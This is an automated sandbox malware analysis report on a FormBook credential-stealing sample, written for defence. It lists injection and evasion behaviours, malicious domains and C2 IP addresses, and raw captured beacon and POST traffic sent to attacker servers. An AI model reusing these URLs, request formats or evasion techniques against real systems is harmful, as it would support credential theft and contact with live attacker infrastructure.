Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uI1A364y2P.exe

Overview

General Information

Sample name:uI1A364y2P.exe
renamed because original name is a hash value
Original sample name:06c76e9f520afe4c48a42bc56781f143cbb4d00d9d2da82ed917d52fb399fc61.exe
Analysis ID:1618201
MD5:78a9ad79bf5cfb3e640e3ca7eb285b76
SHA1:05a65af8ba898d5bc35cc4d05bf8e10a467565b0
SHA256:06c76e9f520afe4c48a42bc56781f143cbb4d00d9d2da82ed917d52fb399fc61
Tags:exetumbetgirislinki-fituser-JAMESWT_MHT
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • uI1A364y2P.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\uI1A364y2P.exe" MD5: 78A9AD79BF5CFB3E640E3CA7EB285B76)
    • aspnet_compiler.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • zk0NoejtsplNyT.exe (PID: 5472 cmdline: "C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\elWqCMKd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • runonce.exe (PID: 7928 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
          • zk0NoejtsplNyT.exe (PID: 2940 cmdline: "C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\mNbX16zvQChK34.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3452 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: AspNetCompiler Execution
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\uI1A364y2P.exe", ParentImage: C:\Users\user\Desktop\uI1A364y2P.exe, ParentProcessId: 7488, ParentProcessName: uI1A364y2P.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7544, ProcessName: aspnet_compiler.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T18:35:35.689100+010028554651A Network Trojan was detected192.168.2.761069162.218.30.23580TCP
                2025-02-18T18:35:59.508402+010028554651A Network Trojan was detected192.168.2.761073103.106.67.11280TCP
                2025-02-18T18:36:13.368671+010028554651A Network Trojan was detected192.168.2.761077104.21.96.180TCP
                2025-02-18T18:36:27.566024+010028554651A Network Trojan was detected192.168.2.761081104.21.48.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T18:35:51.601364+010028554641A Network Trojan was detected192.168.2.761070103.106.67.11280TCP
                2025-02-18T18:35:54.199286+010028554641A Network Trojan was detected192.168.2.761071103.106.67.11280TCP
                2025-02-18T18:35:56.962404+010028554641A Network Trojan was detected192.168.2.761072103.106.67.11280TCP
                2025-02-18T18:36:06.088409+010028554641A Network Trojan was detected192.168.2.761074104.21.96.180TCP
                2025-02-18T18:36:08.019403+010028554641A Network Trojan was detected192.168.2.761075104.21.96.180TCP
                2025-02-18T18:36:11.180744+010028554641A Network Trojan was detected192.168.2.761076104.21.96.180TCP
                2025-02-18T18:36:19.363337+010028554641A Network Trojan was detected192.168.2.761078104.21.48.180TCP
                2025-02-18T18:36:21.623596+010028554641A Network Trojan was detected192.168.2.761079104.21.48.180TCP
                2025-02-18T18:36:24.986551+010028554641A Network Trojan was detected192.168.2.761080104.21.48.180TCP
                2025-02-18T18:36:33.901359+010028554641A Network Trojan was detected192.168.2.761082134.122.133.8080TCP
                2025-02-18T18:36:36.935560+010028554641A Network Trojan was detected192.168.2.761083134.122.133.8080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: uI1A364y2P.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&6pUT9=BnsLTbOHvZg4EAvira URL Cloud: Label: malware
                Source: http://www.kjuw.party/e0jv/Avira URL Cloud: Label: malware
                Source: http://www.lucynoel6465.shop/jgkl/?rTuLCZ7=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&6pUT9=BnsLTbOHvZg4EAvira URL Cloud: Label: malware
                Source: https://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAAvira URL Cloud: Label: malware
                Source: http://www.l63339.xyz/vhr7/?6pUT9=BnsLTbOHvZg4E&rTuLCZ7=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6Avira URL Cloud: Label: malware
                Source: http://www.tumbetgirislinki.fit/k566/?rTuLCZ7=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN&6pUT9=BnsLTbOHvZg4EAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: uI1A364y2P.exeReversingLabs: Detection: 62%
                Source: uI1A364y2P.exeVirustotal: Detection: 51%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: uI1A364y2P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: uI1A364y2P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: CZXSYYS.pdb source: uI1A364y2P.exe
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.1897043771.0000000001730000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000007.00000003.1896057355.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.0000000004590000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000002.2623264722.000000000472E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000007.00000003.1900296225.00000000043E3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.1896688737.0000000001197000.00000004.00000020.00020000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000003.1881603043.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zk0NoejtsplNyT.exe, 00000006.00000002.2621245081.00000000004FF000.00000002.00000001.01000000.00000008.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2621245434.00000000004FF000.00000002.00000001.01000000.00000008.sdmp
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0036C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C8D0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then xor eax, eax7_2_00359EF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then mov ebx, 00000004h7_2_043E04E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61073 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61071 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61069 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61079 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61076 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61074 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61070 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61080 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61077 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61083 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61072 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:61081 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61075 -> 104.21.96.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61082 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:61078 -> 104.21.48.1:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.l63339.xyz
                Source: DNS query: www.seasay.xyz
                Source: global trafficTCP traffic: 192.168.2.7:60862 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vhr7/?6pUT9=BnsLTbOHvZg4E&rTuLCZ7=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0DPw8ZLv8n+jVvEkjzRDyf1FFJKGTm/x08ZOhgwkEPf0hvFuhdZt1S6 HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7Qzpj06nGEzNEnovnPrsEb7KL1brrzNpzul2VEXvMTZ1g4GQAuWECb3v8&6pUT9=BnsLTbOHvZg4E HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /k566/?rTuLCZ7=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MdLjldftk+pS4j839nhzGVAWPSO5aQYaeXSj4P+pnuEIGWZVsh7JvfN&6pUT9=BnsLTbOHvZg4E HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficHTTP traffic detected: GET /jgkl/?rTuLCZ7=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+IqhGLYCnqltFYDkW9rwSVxH+ZM2/XnYhAogS2Zyd/o6zK+cbwINARG&6pUT9=BnsLTbOHvZg4E HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                Source: global trafficDNS traffic detected: DNS query: time.windows.com
                Source: global trafficDNS traffic detected: DNS query: www.l63339.xyz
                Source: global trafficDNS traffic detected: DNS query: www.seasay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global trafficDNS traffic detected: DNS query: www.kjuw.party
                Source: unknownHTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 220Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 72 54 75 4c 43 5a 37 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 50 65 31 62 32 68 5a 31 77 32 2f 37 5a 41 2f 31 69 55 4a 65 31 6c 63 56 34 50 67 66 68 49 71 4e 47 72 71 31 48 69 72 77 33 5a 38 4d 66 31 69 75 77 3d 3d Data Ascii: rTuLCZ7=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1Pe1b2hZ1w2/7ZA/1iUJe1lcV4PgfhIqNGrq1Hirw3Z8Mf1iuw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTIp1AfDHdosLPOI5GJ54PSkitQ75lggHtrBmGVfPfmUBmqRC8xrmrVK5LTlFnnH%2F3PBAjZH4ExeohgpsYdZ3VdLNrryKQmAj3%2BpqM5qMAqmxG0t76jX4yBbZJrI8bPXNo2o13oQiKm6zt0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc70f88a745ef-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=47201&min_rtt=47201&rtt_var=23600&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=863&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 31 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 02 d7 1c db 33 87 ae 66 df ea 56 b5 0d 08 01 92 40 80 84 24 f4 72 0f 4b b2 88 55 ec 92 cf fc 20 ff 0d ff 32 1f 55 f5 52 5d 25 75 f7 9d f1 83 f3 a1 44 66 46 44 46 c6 f2 05 95 c9 6f bf fd f6 f8 2f 93 a5 b8 76 0c 09 8a db 3c fb f4 db e3 cb 0f 04 41 d0 63 0c dc e0 f3 63 0e 5a 17 8a db b6 ba 07 c7 2e e9 9f ee c4 b2 68 41 d1 de b7 a7 0a dc 41 fe 4b ef e9 ae 05 63 8b 5c 44 fc 0e f9 b1 5b 37 a0 7d ea da f0 9e bd bb 29 c7 f5 63 70 7f e1 af cb ec 95 a0 a2 bc f7 2f 53 37 19 8d da 8d 72 f7 cf 70 48 63 95 d4 a0 79 c5 82 7e 47 5b b8 39 78 ba eb 13 30 54 65 dd be 22 1b 92 a0 8d 9f 02 d0 27 3e b8 7f ee 7c 80 92 22 69 13 37 bb 6f 7c 37 03 4f d8 c7 af a2 da a4 cd c0 27 12 25 21 bd 6c a1 69 d9 15 c1 23 f2 32 f8 42 d0 b4 a7 0c 40 17 bb 7d 36 97 df 34 9f 99 2f cd 2b 83 13 f4 5f 5f bb 97 16 96 45 7b 1f ba 79 92 9d 1e 20 be 4e dc ec 03 a4 80 ac 07 6d e2 bb 1f a0 c6 2d 9a fb 06 d4 49 f8 fb 7b b6 26 39 83 07 08 23 ab f1 fb c9 2c 29 c0 7d 0c 92 28 6e 1f 20 ec 23 89 b3 14 83 91 38 Data Ascii: 1310ZYJr~3fV@$rKU 2UR]%uDfFDFo/v<AccZ.hAAKc\D[7})cp/S7rpHcy~G[9x0Te"'>|"i7o|7O'%!li#2B@}64/+__E{y Nm-I{&9#,)}(n #8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2PRrGgYXXPyQ4iT5S0BeO9VZ%2FxoMmxIzwHBUv%2FdZAKogu3dvINWoU3zIVLyigsYbdWnhDo%2FjBBlRZuIepkHyh%2FzlR9MnTlDxjRXXjH8anNaPfPul23xNJVpvoxObEW7eEonmtt%2FIbOil68%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc730c8dce813-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37090&min_rtt=37090&rtt_var=18545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=575&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 31 33 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 Data Ascii: 2131<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
